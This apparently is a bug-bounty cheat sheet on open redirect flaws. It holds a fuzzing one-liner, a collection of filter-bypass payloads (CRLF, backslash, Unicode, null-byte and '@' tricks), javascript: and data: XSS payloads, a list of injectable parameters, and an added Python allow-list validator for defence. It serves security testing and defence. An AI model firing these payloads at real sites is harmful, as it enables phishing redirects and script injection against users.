Open Redirect

Example:

https://google.com/?redirect_to=https://gmail.google.com

Could change to:

https://google.com/?redirect_to=https://attacker.com

Keep an eye out for URL parameters with names such as url=, redirect=, next=, etc. In some cases redirect parameters are labelled with just a single character, such as r= or u=.

When a user requests a resource without an authenticated session, web applications usually redirect the user to the login form URL, which carries the link to the requested resource as a URL parameter. After a successful login, the application uses that parameter to redirect the user to the URL they originally tried to access. Therefore, open redirect vulnerabilities are usually found in login forms.

Bypass payloads:

Some applications filter, whitelist or blacklist the redirect parameter before acting on it.

Fuzz with all payloads from PayloadsAllTheThings.

Fuzzing

Replace www.whitelisteddomain.tld in Open-Redirect-payloads.txt with the specific whitelisted domain from your test case.

To do this, simply change the WHITELISTEDDOMAIN value www.test.com to the domain of your test case.

WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt

Filter Bypass

Shopify login open redirect

http://mystore.myshopify.com/account/login?checkout_url=attacker.com
redirects to:
http://mystore.myshopify.com.attacker.com

Using a whitelisted domain or keyword

www.whitelisted.com.evil.com redirects to evil.com

Using CRLF to bypass "javascript" blacklisted keyword

java%0d%0ascript%0d%0a:alert(0)

Using "//" to bypass "http" blacklisted keyword

//google.com

Using "https:" to bypass "//" blacklisted keyword

https:google.com

Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)

\/\/google.com/
/\/google.com/

Using "%E3%80%82" to bypass "." blacklisted character

/?redir=google。com
//google%E3%80%82com

Using null byte "%00" to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using the "@" character: the browser treats everything before the "@" as userinfo and goes to the host after it

http://www.theirsite.com@yoursite.com/

Creating folder as their domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Host/Split Unicode Normalization

https://evil.c℀.example.com ---> https://evil.ca/c.example.com
http://a.com/X.b.com

XSS from Open URL - If it's in a JS variable

";alert(0);//

XSS from data:// wrapper

http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

XSS from javascript:// wrapper

http://www.example.com/redirect.php?url=javascript:prompt(1)
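On the defending side, the bypasses above all fail against a validator that accepts only same-site paths or absolute URLs whose host matches an allow-list exactly. The following is an added example, not code from the original page or from any project it cites; ALLOWED_HOSTS is an assumed value and the function name is hypothetical.

```python
# Added example (not from the original page): validator for a "next"/"redirect_to"/
# "checkout_url" style parameter. ALLOWED_HOSTS is an assumed set of app-owned hosts.
import unicodedata
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.com", "accounts.example.com"}   # assumed app-owned hosts
FALLBACK = "/"


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS):
    """Return `value` if it is a safe redirect target, otherwise the same-site FALLBACK.

    Apply it to the single value the application will actually redirect to; with
    parameter pollution (?next=a&next=b) that is whichever one the framework picks.
    """
    if not value:
        return FALLBACK
    # CRLF and NUL (java%0d%0ascript, google%00.com) can split headers or truncate
    # checks in other layers, so any control character fails closed.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return FALLBACK
    # NFKC folds confusables such as U+2100 (℀ -> "a/c"), so the host inspected below
    # is closer to what the browser will connect to after its own IDNA mapping.
    value = unicodedata.normalize("NFKC", value)
    # Browsers treat "\" like "/" in the authority, so "\/\/evil.com" means "//evil.com".
    value = value.replace("\\", "/")
    # Same-site relative path: exactly one leading slash. "//evil.com" and
    # "///evil.com" are scheme-relative (off-site) URLs to a browser.
    if value.startswith("/") and not value.startswith("//"):
        return value
    parts = urlsplit(value)
    # "https:google.com" (scheme without authority), javascript:/data: wrappers and a
    # bare "google.com" all stop here: only a full http(s) URL may continue.
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return FALLBACK
    # "http://www.theirsite.com@yoursite.com/": userinfo never belongs in our own URLs.
    if "@" in parts.netloc:
        return FALLBACK
    host = parts.hostname or ""
    # Exact match only. Suffix or substring checks are what let
    # "www.whitelisted.com.evil.com" and "google。com" variants through.
    if not host.isascii() or host not in allowed_hosts:
        return FALLBACK
    return value
```

The fallback is a fixed same-site path rather than an error so that a rejected value degrades to the application's own landing page.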

Common injection parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

References

https://book.hacktricks.xyz/pentesting-web/open-redirect
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect
https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
